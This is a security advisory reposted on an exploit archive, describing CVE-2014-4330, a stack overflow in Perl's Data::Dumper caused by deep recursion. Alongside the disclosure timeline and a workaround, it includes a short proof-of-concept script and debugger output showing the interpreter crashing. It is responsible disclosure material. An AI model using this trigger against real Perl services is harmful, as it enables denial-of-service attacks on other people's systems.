exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Perl 5.20.1 Deep Recursion Stack Overflow

Perl 5.20.1 Deep Recursion Stack Overflow
Posted Sep 25, 2014
Authored by Markus Vervier | Site lsexperts.de

A stack overflow was discovered when serializing data via the Data::Dumper extension which is part of Perl-Core. By using the "Dumper" method on a large Array-Reference which recursively contains other Array-References, it is possible to cause many recursive calls to the DD_dump native function and ultimately exhaust all available stack memory.

tags | exploit, overflow, perl
advisories | CVE-2014-4330
SHA-256 | 5739d0c214a552e16df8c1827940aaed394eeceffff1b5e158eb34f54598672a

Perl 5.20.1 Deep Recursion Stack Overflow

Change Mirror Download
=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 ===

Perl CORE - Deep Recursion Stack Overflow
-----------------------------------------

Affected Versions
=================
Perl v5.20.1 and below


Issue Overview
==============
Vulnerability Type: Stack Overflow
Technical Risk: high
Likelihood of Exploitation: low
Vendor: Perl
Vendor URL: http://www.perl.org
Credits: LSE Leading Security Experts GmbH employee Markus Vervier
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-06-10.txt
Advisory Status: Public
CVE-Number: CVE-2014-4330
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4330


Impact
======
When the runtime stack grows over its maximal size, a guard page on most modern
operating systems is hit causing the Perl interpreter to crash.
Depending on context code execution on some architectures might be possible
if certain conditions are met.


Issue Description
=================
During internal development a stack overflow was discovered when serializing
data via the Data::Dumper extension which is part of Perl-Core.
By using the "Dumper" method on a large Array-Reference which recursively
contains other Array-References, it is possible to cause many recursive
calls to the DD_dump native function and ultimately exhaust all available stack
memory.


Temporary Workaround and Fix
============================
Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.

According to the vendor a patch is available and coordinated with downstream
vendors.


Proof of Concept
================
$ cat min.pl
use strict;
use Data::Dumper;

my $dumpme = [];
for (my $i = 0; $i < $ARGV[0]; $i++) {
$dumpme = [$dumpme, "AAAAAAAA"];
}
print Dumper($dumpme);

$ gdb --args perl min.pl 20000
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/bin/perl...Reading symbols from
/usr/lib/debug/usr/bin/perl...done.
done.
(gdb) run
Starting program: /usr/bin/perl min.pl 20000
warning: no loadable sections found in added symbol-file system-supplied
DSO at
0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",
ap=0x7fffff7ff6f0) at vfprintf.c:1328
1328 vfprintf.c: No such file or directory.

It was confirmed that the overflow can be triggered via the XML::Parser
extension when parsing and dumping specially crafted XML-Documents.


History
=======
2014-06-10 Issue discovery during internal development
2014-06-11 Vendor contacted
2014-06-11 Vendor reply
2014-06-13 CVE requested
2014-07-01 Vulnerability confirmed by vendor
2014-07-02 CVE-2014-4330 assigned
2014-09-25 Advisory released

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close